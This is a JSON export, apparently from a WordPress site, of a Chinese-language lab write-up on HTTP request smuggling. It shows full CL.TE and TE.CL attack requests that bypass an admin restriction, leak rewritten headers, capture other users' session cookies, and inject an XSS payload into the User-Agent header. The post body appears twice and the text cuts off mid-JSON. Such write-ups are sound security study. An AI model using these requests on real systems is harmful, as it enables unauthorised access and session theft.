<\/p>\n\n\n\n
\u95dc\u65bc\u8acb\u6c42\u8d70\u79c1\u7684\u4ecb\u7d39\u53ef\u53c3\u8003<\/p>\n\n\n\n\nRequest Smuggling<\/a><\/blockquote><\/iframe>\n<\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>\u4f7f\u7528\u8d70\u79c1\u8acb\u6c42\u5e38\u898b\u7684\u653b\u64ca\u65b9\u5f0f\u6709\u4ee5\u4e0b\u5e7e\u7a2e\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u9952\u904e\u8a2a\u554f\u9650\u5236\u4fdd\u8b77<\/li>\n\n\n\n<li>\u63ed\u9732\u8acb\u6c42\u654f\u611f\u4fe1\u606f<\/li>\n\n\n\n<li>\u6355\u7372\u5176\u4ed6\u7528\u6236\u7684\u8acb\u6c42<\/li>\n\n\n\n<li>\u53cd\u5c04XSS\u653b\u64ca<\/li>\n<\/ul>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u9952\u904e\u8a2a\u554f\u9650\u5236\u4fdd\u8b77<\/h2>\n\n\n\n<p>\u6b63\u5e38\u8a2a\u554f\/admin\u6642\uff0c\u8fd4\u56de<code>\"Path \/admin is blocked\"<\/code><\/p>\n\n\n\n<p>\u4f46\u76ee\u6a19\u6709CL.TE\u6f0f\u6d1e\uff0c\u56e0\u6b64\u53ef\u4f7f\u7528\u4ee5\u4e0b\u8acb\u6c42\u653b\u64ca<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############# request twice ############# \nPOST \/ HTTP\/1.1\nHost: ac631fc51f38e05280923fa5000e0064.web-security-academy.net\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 37\nTransfer-Encoding: chunked\n\n0\n\nGET \/admin HTTP\/1.1\n\n############# second response ############# \n...omit...\nAdmin interface only available if logged in as an administrator, or if requested as localhost\n...omit...<\/code><\/pre>\n\n\n\n<p>\u6210\u529f\u63a5\u89f8\u5230admin\u9801\u9762\uff0c\u4f46\u53ea\u5141\u8a31localhost\u8a2a\u554f\uff0c\u56e0\u6b64\u8981\u5728\u4fee\u6539\u653b\u64ca\u8acb\u6c42\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############# request twice ############# \nPOST \/ HTTP\/1.1\nHost: ac631fc51f38e05280923fa5000e0064.web-security-academy.net\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 54\nTransfer-Encoding: chunked\n\n0\n\nGET \/admin HTTP\/1.1\nHost: localhost\n\n############# second response ############# \nyou can see admin interface\n\n<\/code><\/pre>\n\n\n\n<p>Lab: Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>\u63db\u500b\u4f8b\u5b50\uff0c\u5982\u679c\u76ee\u6a19\u6539\u70baTE.CL\u6f0f\u6d1e\uff0c\u53ef\u6539\u7528\u4ee5\u4e0b\u8acb\u6c42\u653b\u64ca<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############# request twice ############# \nPOST \/ HTTP\/1.1\nHost: acd01ff61f66e0678013454c001d00b6.web-security-academy.net\nContent-length: 4\nTransfer-Encoding: chunked\n\n87\nGET \/admin HTTP\/1.1\nHost: localhost\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 15\n\nx=1\n0\n\n############# second response ############# \nyou can see admin interface<\/code><\/pre>\n\n\n\n<p>lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u63ed\u9732\u8acb\u6c42\u654f\u611f\u4fe1\u606f<\/h2>\n\n\n\n<p>\u5728\u8a31\u591a\u61c9\u7528\u7a0b\u5f0f\u4e2d\uff0c\u524d\u7aef\u4f3a\u670d\u5668\u5728\u5c07\u8acb\u6c42\u8f49\u767c\u5230\u5f8c\u7aef\u4f3a\u670d\u5668\u4e4b\u524d\u5c0d\u8acb\u6c42\u9032\u884c\u4e00\u4e9b\u91cd\u5beb\uff0c\u901a\u5e38\u662f\u900f\u904e\u6dfb\u52a0\u4e00\u4e9b\u984d\u5916\u7684\u8acb\u6c42\u6a19\u982d<\/p>\n\n\n\n<p>\u5982\u4e0b\uff0c\u5c0d\u76ee\u6a19\u767c\u653b\u64ca\u5f8c\uff0c\u8fd4\u56de\u7684\u7d50\u679c\u767c\u73fe<code>X-WwcdiB-Ip: 122.55.108.34<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############# request twice ############# \nPOST \/ HTTP\/1.1\nHost: ac471f931ebc52d180f32c9e00b300a9.web-security-academy.net\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 124\nTransfer-Encoding: chunked\n\n0\n\nPOST \/ HTTP\/1.1\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 200\nConnection: close\n\nsearch=test\n############# second response ############# \n...omit...\n<h1>0 search results for 'testPOST \/ HTTP\/1.1\nX-WwcdiB-Ip: 122.55.108.34\nHost: ac471f931ebc52d180f32c9e00b300a9.web-security-academy.net\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 124\nTransfer-'<\/h1>\n...omit...<\/code><\/pre>\n\n\n\n<p>\u7531\u65bc\u8a72\u76ee\u6a19\u53ea\u9650127,0,0.1\u8a2a\u554f\uff0c\u56e0\u6b64\u5c07\u653b\u64ca\u8acb\u6c42\u6539\u70ba<code>X-WwcdiB-Ip: 127.0.0.1<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############# request twice ############# \nPOST \/ HTTP\/1.1\nHost: ac471f931ebc52d180f32c9e00b300a9.web-security-academy.net\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 143\nTransfer-Encoding: chunked\n\n0\n\nGET \/admin HTTP\/1.1\nX-WwcdiB-Ip: 127.0.0.1\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 10\nConnection: close\n\nx=1\n############# second response ############# \nyou can see admin interface<\/code><\/pre>\n\n\n\n<p>Lab: Exploiting HTTP request smuggling to reveal front-end request rewriting<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u6355\u7372\u5176\u4ed6\u7528\u6236\u7684\u8acb\u6c42<\/h2>\n\n\n\n<p>\u5047\u5982\u6b63\u5e38\u767c\u6587\u8acb\u6c42\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/post\/comment HTTP\/1.1\n...omit...\nCookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp\ncsrf=668TCjg6wdAu0ydXM6EAPMWgwX43Q2GA&postId=4&comment=test&name=t&email=t%40gmal.com&website=<\/code><\/pre>\n\n\n\n<p>\u5982\u679c\u76ee\u6a19\u6709TECL\u5f31\u9ede\uff0c\u53ef\u767c\u9001\u4ee5\u4e0b\u8acb\u6c42<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/ HTTP\/1.1\nHost: ac8c1f511e1b975f80e47d1000550026.web-security-academy.net\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 277\nTransfer-Encoding: chunked\n\n0\n\nPOST \/post\/comment HTTP\/1.1\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 805\nCookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp\n\ncsrf=668TCjg6wdAu0ydXM6EAPMWgwX43Q2GA&postId=4&name=Carlos+Montoya&email=carlos%40normal-user.net&website=&comment=tttt<\/code><\/pre>\n\n\n\n<p>\u5047\u5982\u6709\u5176\u4ed6\u4eba\u9001\u51fa\u8acb\u6c42\u8a2a\u554f\u7db2\u7ad9\uff0c\u5982\u4e0b\u3002\u5c31\u6703\u8207\u525b\u525b\u7684\u8d70\u79c1\u8acb\u6c42\u5408\u4f75<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/post?postId=4\n...omit...\nCookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp<\/code><\/pre>\n\n\n\n<p>\u5408\u4f75\u5f8c\u7684\u8acb\u6c42\u5982\u4e0b\uff0c\u9001\u51fa\u5f8c\uff0ccomment\u53c3\u6578\u9644\u52a0\u4e86\u5176\u4ed6\u9001\u51fa\u7684\u8acb\u6c42\u5167\u5bb9\uff0c\u4e5f\u5305\u542b\u5c0d\u65b9\u7684cookie<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/post\/comment HTTP\/1.1\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 805\nCookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp\n\ncsrf=668TCjg6wdAu0ydXM6EAPMWgwX43Q2GA&postId=4&name=Carlos+Montoya&email=carlos%40normal-user.net&website=&comment=ttttGET \/post?postId=4\n...omit...\nCookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp<\/code><\/pre>\n\n\n\n<p>\u9019\u4e9b\u5176\u4ed6\u4eba\u9001\u51fa\u7684\u5167\u5bb9\u5c31\u6703\u6839\u64da\u8acb\u6c42\u767c\u9001\u5230\u7db2\u7ad9\u4e0a\uff0c\u800ccomment\u7684\u5167\u5bb9\u5c31\u6703\u5927\u81f4\u5982\u4e0b\uff0c\u6210\u529f\u53d6\u5f97\u5c0d\u65b9cookie<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ttttGET \/post?postId=4\n...omit...\nCookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp<\/code><\/pre>\n\n\n\n<p>\u5982\u679c\u6c92\u6709\u628a\u5b8c\u6574\u5167\u5bb9\u8cbc\u4e0a\u53bb\uff0c\u53ea\u5408\u4f75\u90e8\u4efd\uff0c\u5982\u4e0b\uff0c\u5c31\u4ee3\u8868\u8acb\u6c42\u8d70\u79c1\u653b\u64ca\u7684content-length\u592a\u5c0f\uff0c\u9700\u8981\u628a\u9577\u5ea6\u52a0\u5927\u624d\u53ef\u4ee5\u5bb9\u7d0d\u66f4\u591a\u5167\u5bb9<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ttttGET \/pos<\/code><\/pre>\n\n\n\n<p>Lab: Exploiting HTTP request smuggling to capture other users’ requests<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u53cd\u5c04XSS\u653b\u64ca<\/h2>\n\n\n\n<p>\u5047\u5982\u8a2a\u554f\u6587\u7ae0\u6642\uff0c\u8fd4\u56de\u5167\u5bb9\u6703\u986f\u793a\u8acb\u6c42\u7684userAgent\uff0c\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############# request ############# \nGET \/post?postId=5 HTTP\/1.1\n...omit...\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/84.0.4147.135 Safari\/537.36\n...omit...\n\n############# response ############# \n...omit...\n<input required type=\"hidden\" name=\"userAgent\" value=\"Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/84.0.4147.135 Safari\/537.36\">\n...omit...<\/code><\/pre>\n\n\n\n<p>\u5982\u679c\u76ee\u6a19\u6709CLTE\u6f0f\u6d1e\uff0c\u90a3\u53ef\u4ee5\u6e96\u5099\u4ee5\u4e0b\u8d70\u79c1\u8acb\u6c42\uff0c\u4e26\u5728userAgent\u4e2d\u52a0\u5165XSS<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############# request twice ############# \nPOST \/ HTTP\/1.1\nHost: acab1fb71ede4624806f0baf0038009a.web-security-academy.net\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 150\nTransfer-Encoding: chunked\n\n0\n\nGET \/post?postId=5 HTTP\/1.1\nUser-Agent: a\"\/><script>alert(1)<\/script>\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 5\n\nx=1<\/code><\/pre>\n\n\n\n<p>\u7576\u5176\u4ed6\u4f7f\u7528\u8005\u8a2a\u554f\u7db2\u7ad9\u9001\u51fa\u8acb\u6c42\u6642\uff0c\u5c31\u6703\u548c\u525b\u525b\u7684\u8d70\u8acb\u6c42\u5408\u4f75\uff0c\u65bc\u662f\u8fd4\u56de\u5167\u5bb9\u5c31\u6703\u986f\u793auserAgent\u4e2d\u7684XSS<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>...omit...\n<input required type=\"hidden\" name=\"userAgent\" value=\"a\"\/><script>alert(1)<\/script>\">\n...omit...<\/code><\/pre>\n\n\n\n<p>Lab: Exploiting HTTP request smuggling to deliver reflected XSS<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u95dc\u65bc\u8acb\u6c42\u8d70\u79c1\u7684\u4ecb\u7d39\u53ef\u53c3\u8003 \u4f7f\u7528\u8d70\u79c1\u8acb\u6c42\u5e38\u898b\u7684\u653b\u64ca\u65b9\u5f0f\u6709\u4ee5\u4e0b\u5e7e …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[368],"tags":[],"class_list":["post-1179","post","type-post","status-publish","format-standard","hentry","category-operations"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1179","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1179"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1179\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1179"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1179"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1179"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
Request Smuggling<\/a><\/blockquote><\/iframe>\n<\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>\u4f7f\u7528\u8d70\u79c1\u8acb\u6c42\u5e38\u898b\u7684\u653b\u64ca\u65b9\u5f0f\u6709\u4ee5\u4e0b\u5e7e\u7a2e\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u9952\u904e\u8a2a\u554f\u9650\u5236\u4fdd\u8b77<\/li>\n\n\n\n<li>\u63ed\u9732\u8acb\u6c42\u654f\u611f\u4fe1\u606f<\/li>\n\n\n\n<li>\u6355\u7372\u5176\u4ed6\u7528\u6236\u7684\u8acb\u6c42<\/li>\n\n\n\n<li>\u53cd\u5c04XSS\u653b\u64ca<\/li>\n<\/ul>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u9952\u904e\u8a2a\u554f\u9650\u5236\u4fdd\u8b77<\/h2>\n\n\n\n<p>\u6b63\u5e38\u8a2a\u554f\/admin\u6642\uff0c\u8fd4\u56de<code>\"Path \/admin is blocked\"<\/code><\/p>\n\n\n\n<p>\u4f46\u76ee\u6a19\u6709CL.TE\u6f0f\u6d1e\uff0c\u56e0\u6b64\u53ef\u4f7f\u7528\u4ee5\u4e0b\u8acb\u6c42\u653b\u64ca<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############# request twice ############# \nPOST \/ HTTP\/1.1\nHost: ac631fc51f38e05280923fa5000e0064.web-security-academy.net\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 37\nTransfer-Encoding: chunked\n\n0\n\nGET \/admin HTTP\/1.1\n\n############# second response ############# \n...omit...\nAdmin interface only available if logged in as an administrator, or if requested as localhost\n...omit...<\/code><\/pre>\n\n\n\n<p>\u6210\u529f\u63a5\u89f8\u5230admin\u9801\u9762\uff0c\u4f46\u53ea\u5141\u8a31localhost\u8a2a\u554f\uff0c\u56e0\u6b64\u8981\u5728\u4fee\u6539\u653b\u64ca\u8acb\u6c42\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############# request twice ############# \nPOST \/ HTTP\/1.1\nHost: ac631fc51f38e05280923fa5000e0064.web-security-academy.net\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 54\nTransfer-Encoding: chunked\n\n0\n\nGET \/admin HTTP\/1.1\nHost: localhost\n\n############# second response ############# \nyou can see admin interface\n\n<\/code><\/pre>\n\n\n\n<p>Lab: Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>\u63db\u500b\u4f8b\u5b50\uff0c\u5982\u679c\u76ee\u6a19\u6539\u70baTE.CL\u6f0f\u6d1e\uff0c\u53ef\u6539\u7528\u4ee5\u4e0b\u8acb\u6c42\u653b\u64ca<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############# request twice ############# \nPOST \/ HTTP\/1.1\nHost: acd01ff61f66e0678013454c001d00b6.web-security-academy.net\nContent-length: 4\nTransfer-Encoding: chunked\n\n87\nGET \/admin HTTP\/1.1\nHost: localhost\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 15\n\nx=1\n0\n\n############# second response ############# \nyou can see admin interface<\/code><\/pre>\n\n\n\n<p>lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u63ed\u9732\u8acb\u6c42\u654f\u611f\u4fe1\u606f<\/h2>\n\n\n\n<p>\u5728\u8a31\u591a\u61c9\u7528\u7a0b\u5f0f\u4e2d\uff0c\u524d\u7aef\u4f3a\u670d\u5668\u5728\u5c07\u8acb\u6c42\u8f49\u767c\u5230\u5f8c\u7aef\u4f3a\u670d\u5668\u4e4b\u524d\u5c0d\u8acb\u6c42\u9032\u884c\u4e00\u4e9b\u91cd\u5beb\uff0c\u901a\u5e38\u662f\u900f\u904e\u6dfb\u52a0\u4e00\u4e9b\u984d\u5916\u7684\u8acb\u6c42\u6a19\u982d<\/p>\n\n\n\n<p>\u5982\u4e0b\uff0c\u5c0d\u76ee\u6a19\u767c\u653b\u64ca\u5f8c\uff0c\u8fd4\u56de\u7684\u7d50\u679c\u767c\u73fe<code>X-WwcdiB-Ip: 122.55.108.34<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############# request twice ############# \nPOST \/ HTTP\/1.1\nHost: ac471f931ebc52d180f32c9e00b300a9.web-security-academy.net\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 124\nTransfer-Encoding: chunked\n\n0\n\nPOST \/ HTTP\/1.1\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 200\nConnection: close\n\nsearch=test\n############# second response ############# \n...omit...\n<h1>0 search results for 'testPOST \/ HTTP\/1.1\nX-WwcdiB-Ip: 122.55.108.34\nHost: ac471f931ebc52d180f32c9e00b300a9.web-security-academy.net\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 124\nTransfer-'<\/h1>\n...omit...<\/code><\/pre>\n\n\n\n<p>\u7531\u65bc\u8a72\u76ee\u6a19\u53ea\u9650127,0,0.1\u8a2a\u554f\uff0c\u56e0\u6b64\u5c07\u653b\u64ca\u8acb\u6c42\u6539\u70ba<code>X-WwcdiB-Ip: 127.0.0.1<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############# request twice ############# \nPOST \/ HTTP\/1.1\nHost: ac471f931ebc52d180f32c9e00b300a9.web-security-academy.net\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 143\nTransfer-Encoding: chunked\n\n0\n\nGET \/admin HTTP\/1.1\nX-WwcdiB-Ip: 127.0.0.1\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 10\nConnection: close\n\nx=1\n############# second response ############# \nyou can see admin interface<\/code><\/pre>\n\n\n\n<p>Lab: Exploiting HTTP request smuggling to reveal front-end request rewriting<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u6355\u7372\u5176\u4ed6\u7528\u6236\u7684\u8acb\u6c42<\/h2>\n\n\n\n<p>\u5047\u5982\u6b63\u5e38\u767c\u6587\u8acb\u6c42\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/post\/comment HTTP\/1.1\n...omit...\nCookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp\ncsrf=668TCjg6wdAu0ydXM6EAPMWgwX43Q2GA&postId=4&comment=test&name=t&email=t%40gmal.com&website=<\/code><\/pre>\n\n\n\n<p>\u5982\u679c\u76ee\u6a19\u6709TECL\u5f31\u9ede\uff0c\u53ef\u767c\u9001\u4ee5\u4e0b\u8acb\u6c42<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/ HTTP\/1.1\nHost: ac8c1f511e1b975f80e47d1000550026.web-security-academy.net\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 277\nTransfer-Encoding: chunked\n\n0\n\nPOST \/post\/comment HTTP\/1.1\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 805\nCookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp\n\ncsrf=668TCjg6wdAu0ydXM6EAPMWgwX43Q2GA&postId=4&name=Carlos+Montoya&email=carlos%40normal-user.net&website=&comment=tttt<\/code><\/pre>\n\n\n\n<p>\u5047\u5982\u6709\u5176\u4ed6\u4eba\u9001\u51fa\u8acb\u6c42\u8a2a\u554f\u7db2\u7ad9\uff0c\u5982\u4e0b\u3002\u5c31\u6703\u8207\u525b\u525b\u7684\u8d70\u79c1\u8acb\u6c42\u5408\u4f75<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/post?postId=4\n...omit...\nCookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp<\/code><\/pre>\n\n\n\n<p>\u5408\u4f75\u5f8c\u7684\u8acb\u6c42\u5982\u4e0b\uff0c\u9001\u51fa\u5f8c\uff0ccomment\u53c3\u6578\u9644\u52a0\u4e86\u5176\u4ed6\u9001\u51fa\u7684\u8acb\u6c42\u5167\u5bb9\uff0c\u4e5f\u5305\u542b\u5c0d\u65b9\u7684cookie<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/post\/comment HTTP\/1.1\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 805\nCookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp\n\ncsrf=668TCjg6wdAu0ydXM6EAPMWgwX43Q2GA&postId=4&name=Carlos+Montoya&email=carlos%40normal-user.net&website=&comment=ttttGET \/post?postId=4\n...omit...\nCookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp<\/code><\/pre>\n\n\n\n<p>\u9019\u4e9b\u5176\u4ed6\u4eba\u9001\u51fa\u7684\u5167\u5bb9\u5c31\u6703\u6839\u64da\u8acb\u6c42\u767c\u9001\u5230\u7db2\u7ad9\u4e0a\uff0c\u800ccomment\u7684\u5167\u5bb9\u5c31\u6703\u5927\u81f4\u5982\u4e0b\uff0c\u6210\u529f\u53d6\u5f97\u5c0d\u65b9cookie<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ttttGET \/post?postId=4\n...omit...\nCookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp<\/code><\/pre>\n\n\n\n<p>\u5982\u679c\u6c92\u6709\u628a\u5b8c\u6574\u5167\u5bb9\u8cbc\u4e0a\u53bb\uff0c\u53ea\u5408\u4f75\u90e8\u4efd\uff0c\u5982\u4e0b\uff0c\u5c31\u4ee3\u8868\u8acb\u6c42\u8d70\u79c1\u653b\u64ca\u7684content-length\u592a\u5c0f\uff0c\u9700\u8981\u628a\u9577\u5ea6\u52a0\u5927\u624d\u53ef\u4ee5\u5bb9\u7d0d\u66f4\u591a\u5167\u5bb9<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ttttGET \/pos<\/code><\/pre>\n\n\n\n<p>Lab: Exploiting HTTP request smuggling to capture other users’ requests<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u53cd\u5c04XSS\u653b\u64ca<\/h2>\n\n\n\n<p>\u5047\u5982\u8a2a\u554f\u6587\u7ae0\u6642\uff0c\u8fd4\u56de\u5167\u5bb9\u6703\u986f\u793a\u8acb\u6c42\u7684userAgent\uff0c\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############# request ############# \nGET \/post?postId=5 HTTP\/1.1\n...omit...\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/84.0.4147.135 Safari\/537.36\n...omit...\n\n############# response ############# \n...omit...\n<input required type=\"hidden\" name=\"userAgent\" value=\"Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/84.0.4147.135 Safari\/537.36\">\n...omit...<\/code><\/pre>\n\n\n\n<p>\u5982\u679c\u76ee\u6a19\u6709CLTE\u6f0f\u6d1e\uff0c\u90a3\u53ef\u4ee5\u6e96\u5099\u4ee5\u4e0b\u8d70\u79c1\u8acb\u6c42\uff0c\u4e26\u5728userAgent\u4e2d\u52a0\u5165XSS<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############# request twice ############# \nPOST \/ HTTP\/1.1\nHost: acab1fb71ede4624806f0baf0038009a.web-security-academy.net\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 150\nTransfer-Encoding: chunked\n\n0\n\nGET \/post?postId=5 HTTP\/1.1\nUser-Agent: a\"\/><script>alert(1)<\/script>\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 5\n\nx=1<\/code><\/pre>\n\n\n\n<p>\u7576\u5176\u4ed6\u4f7f\u7528\u8005\u8a2a\u554f\u7db2\u7ad9\u9001\u51fa\u8acb\u6c42\u6642\uff0c\u5c31\u6703\u548c\u525b\u525b\u7684\u8d70\u8acb\u6c42\u5408\u4f75\uff0c\u65bc\u662f\u8fd4\u56de\u5167\u5bb9\u5c31\u6703\u986f\u793auserAgent\u4e2d\u7684XSS<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>...omit...\n<input required type=\"hidden\" name=\"userAgent\" value=\"a\"\/><script>alert(1)<\/script>\">\n...omit...<\/code><\/pre>\n\n\n\n<p>Lab: Exploiting HTTP request smuggling to deliver reflected XSS<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u95dc\u65bc\u8acb\u6c42\u8d70\u79c1\u7684\u4ecb\u7d39\u53ef\u53c3\u8003 \u4f7f\u7528\u8d70\u79c1\u8acb\u6c42\u5e38\u898b\u7684\u653b\u64ca\u65b9\u5f0f\u6709\u4ee5\u4e0b\u5e7e …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[368],"tags":[],"class_list":["post-1179","post","type-post","status-publish","format-standard","hentry","category-operations"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1179","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1179"}],"version-history":[{"count":0,"href":